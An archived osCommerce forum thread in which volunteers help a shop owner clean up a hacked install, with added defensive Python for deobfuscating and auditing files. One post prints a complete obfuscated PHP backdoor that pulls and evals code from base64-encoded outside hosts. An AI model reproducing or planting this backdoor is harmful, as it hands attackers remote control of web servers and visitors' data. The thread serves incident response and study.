osCommerce

Weird Problem a page from nowhere...


saduneni

Please take a look at this link, it came from nowhere:

http://www.girlzwholesale.com/catalog/imag...eb256204e2.html

The directory /sierra doesn't even exist! I need help; this is a new setup and I have limited help from my host (www.websitesource.com). They suggested I open a ticket in osCommerce. I thought there are "master minds" over here, so I am trying. Thanks in advance.

Link to comment
Share on other sites

You've been hacked because the permissions on your /catalog/images folder are at 777.

Look at these files:

/catalog/images/71512.php
/catalog/images/banners/52488.php
/catalog/images/default/142853.php
/catalog/images/dvd/76321.php
/catalog/images/gt_interactive/137999.php
/catalog/images/hewlett_packard/141102.php
/catalog/images/icons/16755.php
/catalog/images/infobox/175095.php
/catalog/images/mail/211443.php
/catalog/images/matrox/130494.php
/catalog/images/microsoft/205609.php

I think you'll find them all bogus.

This one looks very suspicious to me:

/catalog/images/fsys2.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I have checked the code and I did not find anything important. It all looks fishy, and the code on all the pages (as mentioned by germ) is similar to the one in fsys2.php, as below. Is this code for anyone that belongs to osCommerce? And if yes, why is it in the image folder?

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

Link to comment
Share on other sites
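
A static triage of the file quoted in the post above, added here as an example and not part of the original thread: it decodes the base64_decode("...") literals as text, joins the concatenated strings, and lists the calls that would load content from a remote URL, with the URLs defanged. SAMPLE is a shortened excerpt of the posted file, and the function names are this example's own.

```python
import base64
import re

# Shortened excerpt of the fsys2.php source quoted above. It is only read as
# text here; nothing in it is executed or fetched.
SAMPLE = r'''<? error_reporting(0); $str=base64_encode($_SERVER["HTTP_HOST"]);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c); ?>'''

B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# One double-quoted literal plus any literals joined to it with the "." operator.
# Assumes no escaped quotes inside literals, which holds for the posted file.
CONCAT = re.compile(r'"[^"]*"(?:\s*\.\s*"[^"]*")*')
SINK = re.compile(
    r'\b(include|require|file_get_contents|curl_init)\s*\(\s*"(https?://[^"]*)"')


def deobfuscate(src):
    """Replace base64_decode("...") calls by their text and join "a"."b" runs."""
    plain = B64_CALL.sub(
        lambda m: '"%s"' % base64.b64decode(m.group(1)).decode("latin-1"), src)
    return CONCAT.sub(
        lambda m: '"%s"' % "".join(re.findall(r'"([^"]*)"', m.group(0))), plain)


def defang(url):
    """Make a URL non-clickable for reports and tickets."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def remote_code_sinks(src):
    """Return (function, defanged URL) for each call that loads remote content."""
    return [(m.group(1), defang(m.group(2)))
            for m in SINK.finditer(deobfuscate(src))]


def evaluates_fetched_code(src):
    """True when the file both fetches remote content and calls eval()."""
    return bool(remote_code_sinks(src)) and re.search(r'\beval\s*\(', src) is not None


if __name__ == "__main__":
    for func, url in remote_code_sinks(SAMPLE):
        print(func, url)
    print("eval of fetched content:", evaluates_fetched_code(SAMPLE))
```

A file in an images folder that includes or evals content fetched from another host is not part of a stock shop install, which matches the replies in this thread.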

Trust me, all those files are BAD.

I know because the same thing happened to me last month. :blush:

There may be BAD files in your admin now, too.

I can't see those.

Link to comment
Share on other sites

The first thing you must do is change the permissions on the /catalog/images folder to 755.

The same with all the folders inside the /catalog/images folder.

Then delete the bad files.

Then change the permissions on all the files in the /catalog/images folder to 644.

Then check your /admin/backups folder for bad files.

And probably /admin/images folder.

You've been hacked for over a month.

The timestamp on most of the bad files is:

10-Mar-2008 16:39

Link to comment
Share on other sites
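
The clean-up steps from the post above as a script, added here as an example and not part of the original thread: audit() lists world-writable paths and script files (with their modification date, which helps date the intrusion) under an images tree, and harden() applies 755 to directories and 644 to files. The extension list, the function names and the temporary tree built in demo() are assumptions of this example; deleting the listed files is left to the operator after review.

```python
import calendar
import os
import stat
import tempfile
import time

# Assumption: extensions the web server would hand to PHP.
SCRIPT_EXT = (".php", ".php3", ".php4", ".php5", ".phtml")


def audit(root):
    """Return (world_writable_paths, [(script_path, mtime_utc_date)]) under root."""
    writable, scripts = [], []
    for dirpath, _dirs, files in os.walk(root):
        for p in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            st = os.lstat(p)
            if stat.S_ISLNK(st.st_mode):
                continue  # do not judge link targets outside the tree
            if st.st_mode & stat.S_IWOTH:
                writable.append(p)
            if stat.S_ISREG(st.st_mode) and p.lower().endswith(SCRIPT_EXT):
                day = time.strftime("%Y-%m-%d", time.gmtime(st.st_mtime))
                scripts.append((p, day))
    return sorted(writable), sorted(scripts)


def harden(root):
    """Set directories to 755 and regular files to 644, as the post instructs."""
    for dirpath, _dirs, files in os.walk(root):
        os.chmod(dirpath, 0o755)
        for f in files:
            p = os.path.join(dirpath, f)
            if not os.path.islink(p):
                os.chmod(p, 0o644)


def demo():
    """Build a constructed images tree, audit it, harden it, audit again."""
    root = tempfile.mkdtemp(prefix="images_")
    os.mkdir(os.path.join(root, "banners"))
    when = calendar.timegm((2008, 3, 10, 16, 39, 0))  # constructed timestamp
    for rel in ("logo.gif", "71512.php", os.path.join("banners", "52488.php")):
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.utime(path, (when, when))
    for d in (root, os.path.join(root, "banners")):
        os.chmod(d, 0o777)
    before = audit(root)
    harden(root)
    return root, before, audit(root)
```

The same audit() can be pointed at the admin backups and admin images folders named in the post.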

Hi Jim, I keep on checking all the files in admin and other areas; so far I did not find any file. But what I did is I have removed fsys2.php (deleted), and it looks like none of the catalog part is affected. I am going to back up and remove all the unwanted files, but my question is, can I change the permission on this folder? Please check the screenshot, I think it's 666 {hope I am right}. Please, I need advice.

abc.gif

Link to comment
Share on other sites

Sorry, overlooked. I am going to try and see.

Thanks


Link to comment
Share on other sites

The permissions need to be 755.

Check all the boxes for USER.

Then for GROUP and OTHER, the READ and EXEC boxes ONLY!

Link to comment
Share on other sites

:thumbsup: Thanks, I have done everything as per your instructions; my shop is in good shape. I have checked all the files in admin but I did not find any goofy files. Am I missing something? Like hidden files I cannot see! And what about the database? Could there be any potential risk involved? Thanks again.


Link to comment
Share on other sites

There weren't any hidden files in mine.

If you got all the bad files, changed the permissions like I said, and checked the admin, then you should be OK now.

Just keep a close eye on it for a while.

Link to comment
Share on other sites

Sure, thanks Jim, thanks for your help.


Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.
